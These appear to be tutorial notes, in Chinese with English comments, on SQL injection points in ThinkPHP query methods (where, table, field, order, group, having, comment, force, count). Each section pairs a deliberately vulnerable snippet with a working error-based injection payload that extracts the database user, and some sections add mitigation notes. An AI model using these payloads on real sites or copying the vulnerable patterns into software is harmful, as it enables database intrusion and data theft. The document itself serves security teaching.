注入
一、where注入
1、语句
// Vulnerable: the raw request value I('id') is concatenated into the WHERE
// string, so the request controls the SQL text (the error-based payload
// below rides on this). Mitigation is the array condition shown in the
// 解决方案 block: the value is then handled as a value, not as SQL.
public function index(){
// String concatenation of untrusted input into SQL is the defect here.
$data = M('user')->where('id='.I('id'))->find();
dump($data);
}
2、报错注入
and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#
3、解决方案
用数组条件查询
// Safe form of the where-injection example: the request value is passed
// inside an array condition, so the framework treats it as a value rather
// than splicing it into the SQL string.
// NOTE(review): I() can return non-scalar values; confirm that the ThinkPHP
// version in use validates array-valued conditions before relying on this.
public function index(){
$map = array('id' => I('id'));
M("User")->where($map)->select();
}
二、table注入
1、语句
// Vulnerable: I('tab') becomes the table name. Identifiers cannot be bound
// as parameters, so the request value ends up in the query text verbatim.
// Mitigation: map the request value onto a fixed whitelist of table names
// and reject anything that does not match.
public function index(){
M()->table(I('tab'))->where('1=1')->find();
}
2、报错注入
where 1=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#
三、field注入
1、语句
public function index(){
//查询id和username字段,name是username的别名,别名可控,产生注入
M('User')->field(array('id','username'=>I('name')))->select();
}
2、报错注入
//查询的表名可控,拼接语句
from thinkphp_user where 1=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#
四、order注入
1、语句
// Vulnerable: in order(array('id' => ...)) the array value is the sort
// direction and is appended to ORDER BY `id` verbatim (see the generated
// SQL below). Mitigation: accept only 'asc' or 'desc' and default otherwise.
public function index(){
M('User')->where('1=1')->order(array('id'=>I('orderby')))->select();
}
SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` a
2、报错注入
and (updatexml(1,concat(0x7e,(select user())),0))#
五、group注入
1、语句
// Vulnerable: group() takes a column list and the generated SQL below shows
// the request value placed directly after GROUP BY. Column names cannot be
// bound as parameters. Mitigation: whitelist the allowed grouping columns.
public function index(){
$data = M('User')->field('max(id),username')->group(I('id'))->select();
}
SELECT max(id),`username` FROM `thinkphp_user` GROUP BY I('id')
2、报错注入
and (updatexml(1,concat(0x7e,(select user())),0))#
(select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(user())),1,62)))a from information_schema.tables group by a)b)#
六、having注入
1、语句
// having: the I('id') group parameter is assumed filtered in this example;
// the having() argument is the injection point.
// Vulnerable: having() receives a raw SQL fragment from the request.
// Mitigation: build HAVING conditions in code; never pass request text.
public function index(){
$data = M('User')->field('max(id),username')->group(I('id'))->having(I('having'))->select();
dump($data);
}
2、报错注入
(select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(user())),1,62)))a from information_schema.tables group by a)b)#
七、comment注入
1、语句
// Vulnerable: comment() embeds the request value inside a SQL comment; the
// payload below shows that closing the comment escapes into live SQL.
// Mitigation: SQL comment text must never be derived from request input.
public function index(){
M('User')->comment(I('com'))->where('1=1')->find();
}
2、报错注入
*/ procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);#
八、索引注入(thinkphp3版本不存在,thinkphp5.0存在)
1、语句
// Vulnerable: force() takes an index name, an identifier that is emitted
// into the query verbatim. Per the heading, this surface exists in ThinkPHP
// 5.0 and not in 3.x. Mitigation: whitelist index names in code.
public function index(){
$data = M('User')->force(I('f'))->select();
dump($data);
}
2、报错注入
) procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);#
九、聚合方法
1、语句
// Vulnerable: the field argument of count() is interpolated into
// COUNT(...) as shown in the generated SQL below, so the request value
// lands inside the query text. Mitigation: whitelist the countable
// columns, or call count() without a request-driven field.
public function index(){
$data = M('User')->count(I('f'));
dump($data);
}
SELECT COUNT(*) AS tp_count FROM `thinkphp_user` LIMIT 1
2、报错注入
*) AS tp_count FROM `thinkphp_user` where 1=1 and (updatexml(1,concat(0x7e,(select user())),0))#)